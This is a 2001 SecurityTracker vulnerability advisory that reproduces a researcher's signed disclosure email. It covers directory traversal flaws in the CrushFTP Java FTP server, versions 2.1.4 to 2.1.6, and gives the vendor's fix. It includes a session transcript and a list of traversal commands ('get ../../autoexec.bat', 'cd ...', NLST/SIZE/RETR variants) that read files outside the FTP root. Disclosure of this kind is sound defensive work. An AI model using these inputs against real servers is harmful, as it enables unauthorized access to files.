CrushFTP Java-based FTP Server Lets Remote Users Change Directories and Download Files Outside of the FTP Server's Root Document Directory
|
|
SecurityTracker Alert ID: 1001475 |
|
SecurityTracker URL: http://securitytracker.com/id/1001475
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 3 2001
|
Impact:
Disclosure of system information, Disclosure of user information
|
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes
|
Version(s): 2.1.4, 2.1.5, 2.1.6
|
Description:
It was reported that there are multiple vulnerabilities in the Java-based CrushFTP server that allow remote users to change directories and download files outside of the server's root document directory.
By using certain strings such as ".." or "...", a remote user can break out of the FTP server's root document directory.l
The following transaction record illustrates the vulnerability ("c:\directory\directory" was used as the FTP root directory).
>ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220-Welcome to CrushFTP!
220 CrushFTP Server Ready.
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Username OK. Need password.
Password:
230-Welcome!
230 Password OK. Connected.
ftp> get ../../autoexec.bat
200 PORT command successful. 127.0.0.1:1868
150 Opening ASCII mode data connection for ../../autoexec.bat (419 bytes).
226-Download File Size:419 bytes @ 0K/sec.
226 Transfer complete.
ftp: 419 bytes received in 0.00Seconds 419000.00Kbytes/sec.
ftp> cd ...
250 "/.../" CWD command successful.
ftp> get command.com
200 PORT command successful. 127.0.0.1:1870
150 Opening ASCII mode data connection for command.com (93890 bytes).
226-Download File Size:93890 bytes @ 92K/sec.
226 Transfer complete.
ftp: 94570 bytes received in 1.86Seconds 50.84Kbytes/sec.
In addition to v2.1.4, two other intermediate versions (v2.1.5, v2.1.6) contain vulnerabilities with the following commands:
NLST ..
NLST ...
SIZE /../../
SIZE /.../
NLST \..\
NLST /../
NLST \...\
RETR \..\.\..\autoexec.bat
RETR ./\...\autoexec.bat
RETR .\.\..\..\autoexec.bat
|
Impact:
A remote user can obtain files and directory listings outside of the FTP server's root document directory.
|
Solution:
Upgrade to v2.1.7, available via the Vendor URL.
|
Vendor URL: www.crushftp.com/ (Links to External Site)
|
Cause:
Access control error, Input validation error
|
Underlying OS:
Java
|
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 3 May 2001 13:13:40 -0800 (PDT)
Subject: Vulnerabilities in CrushFTP Server
|
--Hushpart_boundary_wiVeMMYWZvLzAgpyxHojaSCJWoXAXbqK
Content-type: text/plain
----- Begin Hush Signed Message from joetesta@hushmail.com -----
Vulnerabilities in CrushFTP Server
Overview
CrushFTP Server 2.1.4 is a java ftp server available from
http://www.crushftp.com. Multiple vulnerabilities exist which allow
users to change directories outside of the ftp root and download files.
Details
The following is an illustration of the problem. An ftp root of
"c:\directory\directory" was used.
>ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220-Welcome to CrushFTP!
220 CrushFTP Server Ready.
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Username OK. Need password.
Password:
230-Welcome!
230 Password OK. Connected.
ftp> get ../../autoexec.bat
200 PORT command successful. 127.0.0.1:1868
150 Opening ASCII mode data connection for ../../autoexec.bat (419 bytes).
226-Download File Size:419 bytes @ 0K/sec.
226 Transfer complete.
ftp: 419 bytes received in 0.00Seconds 419000.00Kbytes/sec.
ftp> cd ...
250 "/.../" CWD command successful.
ftp> get command.com
200 PORT command successful. 127.0.0.1:1870
150 Opening ASCII mode data connection for command.com (93890 bytes).
226-Download File Size:93890 bytes @ 92K/sec.
226 Transfer complete.
ftp: 94570 bytes received in 1.86Seconds 50.84Kbytes/sec.
The vendor issued two versions since I made initial contact to address
additional variations. The following is a list of vulnerabilities which
affected these intermediate versions (v2.1.5, v2.1.6):
NLST ..
NLST ...
SIZE /../../
SIZE /.../
NLST \..\
NLST /../
NLST \...\
RETR \..\.\..\autoexec.bat
RETR ./\...\autoexec.bat
RETR .\.\..\..\autoexec.bat
Solution
Upgrade to v2.1.7 at:
http://www.crushftp.com
Vendor Status
The program author, Ben Spink, was contacted via <spinkb@mac.com> on
Friday, April 20, 2001. I would like to thank him for taking this
matter seriously and showing extra effort to resolve these problems.
- Joe Testa
e-mail: joetesta@hushmail.com
web page: http://hogs.rit.edu/~joet
AIM: LordSpankatron
----- Begin Hush Signature v1.3 -----
H4DN+gBMDsfVP0qnC4F8dEdXR7FSneNzs2Now6Thibu+zett3cgrNijdAG77GWmeUrvE
/eoSsg0s6IjBVwrVZXt0CN2XVslnxRwCxpPWAwfVgrQGSGigcRInv/WxWhxA0xEhiffv
Wc3ZnhtPy0toe7N4XKyma58FwlqVRsXKqc5bJgBQquX0wlsnrLkpK3nSVhBBj/NkEkpG
yoyaLAXBNVtfZz+AEdR6iuMZYVdIpsHToi4x5hT6cZNZtjD+MWT8vFT3SsAi0NQ6PqpI
0p6HB8uNJ3ra/oExJleegIDWkJMN/AoIhjuxlrCJxt2yu0CHVeUt+7c353Nv38C8QQvm
bkkLdHMxMj6VvY99mnhyuBcXuJrGigPIguZAp6GER1uARXrv4w0RJ0QIeuB5JI4LXwBb
sIFfCcy/boBIg3QNOPP/eoxGTQ7XCpPBcfXUHrPtk/Xd06XJ/9XhBC+fLzGgHMEE37hH
wbPXMDaJ6OvogRLDVunx+UVJiqjybft960vFm2lgXd75
----- End Hush Signature v1.3 -----
This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools
Free, encrypted, secure Web-based email at www.hushmail.com
--Hushpart_boundary_wiVeMMYWZvLzAgpyxHojaSCJWoXAXbqK--
|
|
